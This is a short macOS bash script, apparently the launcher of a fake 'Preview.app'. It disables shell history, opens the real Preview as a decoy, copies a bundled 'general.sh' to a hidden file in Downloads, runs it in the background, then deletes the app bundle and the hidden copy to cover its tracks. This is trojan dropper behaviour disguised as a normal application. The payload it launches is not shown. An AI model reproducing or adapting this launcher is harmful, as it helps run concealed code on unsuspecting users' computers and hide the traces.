#!/bin/bash
set +o history
CDIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) #Directory of app
cd ${CDIR}

open -a Preview

cp ./general.sh ~/Downloads/.general.sh
nohup ~/Downloads/.general.sh &

cd ..

rm -rf ./Preview.app/ #cleanup
rm ~/Downloads/.general.sh
